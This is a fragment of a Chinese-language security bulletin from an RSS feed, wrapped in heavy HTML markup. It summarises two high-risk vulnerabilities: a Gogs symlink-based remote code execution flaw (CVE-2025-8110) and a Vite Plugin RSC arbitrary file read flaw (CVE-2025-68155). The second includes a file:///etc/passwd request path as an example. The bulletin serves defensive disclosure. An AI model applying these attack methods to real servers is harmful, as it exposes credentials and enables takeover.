mpa-from-tpl="t" data-pm-slice="9 12 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Gogs 远程代码执行漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">(CVE-2025-8110)</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit" target="_blank">https://www.wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit</a></span></span></span><span leaf=""><a class="wx_topic_link" topic-id="mjefz3zm-csh7rl" style="color: #576B95 !important;" data-topic="1"><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">#executive</span></a></span><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">-summary-0</span></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Gogs是一个流行的自托管 Git 服务，使用 Go 语言编写。它为 GitLab 或 GitHub Enterprise 提供了一个轻量级的替代方案，并因其易于部署和资源占用极低而深受开发者欢迎。由于自托管，Gogs常见于本地和云环境中，并且通常暴露在互联网上以支持远程协作。 Gogs API 允许用户在常规 Git 协议之外修改文件，虽然会对路径名进行验证，但却无法验证符号链接的目标路径。攻击者可通过创建指向 .git 目录的符号链接对文件进行覆盖，最终实现远程命令执行。该漏洞为CVE-2024-55947的修复绕过。</span></p></div></div></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Vite Plugin RSC 任意文件读取漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-68155）</span></span></p></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="7 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;font-size: 14px;"><span style="font-weight: bold;"><span leaf="">风险等级：<span textstyle="" style="color: rgb(255, 169, 0);">高危</span></span></span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span leaf="" mpa-font-style="md8jnd0dzic" style="font-size: 14px;"><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d" target="_blank">https://github.com/vitejs/vite-plugin-react/commit/582fba0b9a52b13fcff6beaaa3bfbd532bc5359d</a></span></span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);"><a href="https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm" target="_blank">https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-g239-q96q-x4qm</a></span></span></p></li></ul><p style="text-indent: 2em;margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="mdiitmhwpo9" style="font-size: 14px;">Vite Plugin RSC 是 Vite 构建工具的一个官方插件，专门用于在 Vite 项目中支持 React Server Components (RSC) 开发。 据官方描述，在 Vite Plugin RSC 0.5.7 及之前的版本中，其开发服务器提供的内置调试端点 /__vite_rsc_findSourceMapURL 在接收用户通过 filename 查询参数传递的文件路径时，若该路径以 file:// 开头，则直接调用 fileURLToPath() 转换为本地路径并使用 fs.readFileSync() 同步读取文件内容，且未对该路径进行任何合法性校验（如是否在项目目录内）。攻击者可通过构造一个指向任意文件的 file:// URL 路径（如 file:///etc/passwd）并发送 HTTP 请求，使该端点读取并返回目标文件的完整内容，从而造成服务器文件系统中敏感信息（例如系统文件、环境变量文件、云服务凭证、SSH 密钥、项目源代码等）的泄露。 注：该漏洞仅影响启用了 @vitejs/plugin-rsc 插件的开发服务器。</span></p></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=45fb0a19&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247510994%26idx%3D1%26sn%3D82016050be2d5e70e1db54951dc74cf2">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 22 Dec 2025 18:54:00 +0800</pubDate>
    </item>
    <item>
      <title>情报每周回顾 2025-12-15</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247510990&amp;idx=1&amp;sn=f73ecff90fdd80239e2f93e6fe0f5ac8</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>腾讯威胁情报中心</span> <span>2025-12-15 16:30</span> <span style="display: inline-block;">江苏</span></p>




  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c8b94799&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6AoQM3RKCWXia1xKyza7Ss8zBicD2yNRmw9icYzd75vXsxribMKvpTsLicwAvpbtY7GAJzfjISjhtBz2BUsELR8zkXw%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="template" mpa-from-tpl="t" data-mpa-action-id="md8hqhg218sw"><div data-mpa-template="t" mpa-from-tpl="t"><div data-mpa-category="模板" data-mpa-template-rows="1" yb-mpa-mark="mark-header" style="width: 100%;" data-mid="" data-mpa-template="t" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;z-index: 1;padding: 0 5px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;flex-direction: column;padding: 17px 10px 14px 10px;background: #FFFFFF;box-shadow: 0px 2px 4px 0px rgba(60, 131, 250, 0.15);" data-mid="" mpa-from-tpl="t"><div style="width: 100%;display: flex;align-items: flex-end;justify-content: space-between;padding: 0 0 3px 0;border-bottom: 1.3px dashed rgba(60, 131, 250, 0.3);" data-mid="" mpa-from-tpl="t"><p style="width: 47px;height: 9px;display: flex;justify-content: center;align-items: center;margin: 0 0 2px 0;flex-shrink: 0;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-imgfileid="100050100" class="rich_pages wxw-img" data-ratio="0.19148936170212766" data-w="94" src="https://wechat2rss.xlab.app/img-proxy/?k=0e691e32&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FHm2rIuksic6yohBk0Kia6W2Hhud1zoaEKFP2yZP0QHMxOicJykLUjiaiayTcgicdqhq5HURXYibhM3y7fMIZHZhMWn5ng%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 12px;color: rgba(60, 131, 250, 0.6);line-height: 17px;letter-spacing: 1px;word-break: break-word;" data-mid=""><span leaf="">腾讯云安全威胁情报中心</span></p></div></div><div style="width: 100%;padding: 14px 0 10px 0;display: flex;align-items: flex-start;justify-content: space-between;border-bottom: 1.3px dashed rgba(60, 131, 250, 